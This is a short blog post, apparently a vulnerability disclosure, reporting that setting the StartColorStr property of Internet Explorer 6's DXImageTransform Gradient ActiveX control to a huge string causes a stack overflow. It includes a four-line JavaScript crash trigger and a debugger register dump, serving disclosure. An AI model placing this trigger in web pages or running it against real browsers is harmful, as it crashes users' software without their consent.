The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).
var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;
Demonstration
eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment